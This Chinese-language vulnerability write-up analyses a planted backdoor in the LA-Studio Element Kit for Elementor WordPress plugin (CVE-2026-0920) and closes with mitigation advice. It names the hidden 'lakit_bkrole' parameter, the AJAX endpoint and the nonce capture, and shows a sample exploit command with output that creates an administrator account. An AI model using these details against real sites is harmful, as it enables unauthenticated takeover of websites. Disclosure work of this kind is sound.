
最近发现的 LA-Studio Element WordPress 插件漏洞的说明与利用载荷。
针对 LA-Studio Element Kit for Elementor(版本 ≤ 1.5.6.3)中发现的关键后门的技术分析与概念验证(PoC)。该漏洞允许未认证用户创建管理员账户。
一名前雇员故意在 ajax_register_handle 函数中植入了一个后门,允许在注册过程中使用隐藏参数提升用户权限。
漏洞类型:授权不当 / 故意植入后门。
目标函数:ajax_register_handle。
后门参数:lakit_bkrole。
影响:完全接管网站。
关键要求:
有效的 WordPress AJAX nonce(_nonce)。
lakit_bkrole 参数设置为 administrator。
捕获 Nonce:拦截合法的注册请求或检查页面源代码,以找到 lakit_ajax 操作的 _nonce。

运行漏洞利用:执行 Python 脚本,提供目标 URL、捕获的 nonce 以及所需的凭据。

示例命令:
python CVE-2026-0920.py -u https://spoilhouses.s2-tastewp.com -n b935edabf2 -ua "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" --user "john_admin" --passw "ComplexPass123"
终端输出:
Plaintext SUCCESS: john_admin created.
结果:新用户 john_admin 以 Administrator 配置文件出现在 WordPress 用户面板中。

拦截到的请求揭示了后门的触发方式:
端点:/wp-admin/admin-ajax.php。
操作:lakit_ajax。
恶意数据:actions 参数中的 JSON 字符串明确包含 "lakit_bkrole":"administrator",插件会处理该参数以授予完整的站点权限。
🛠️ 缓解措施 更新:立即升级至 v1.6.0。
审计:检查 wp_users 表中是否存在最近创建的未授权管理员账户,例如 john_admin。
清理:删除发现的任何可疑账户,并轮换所有合法管理员密码。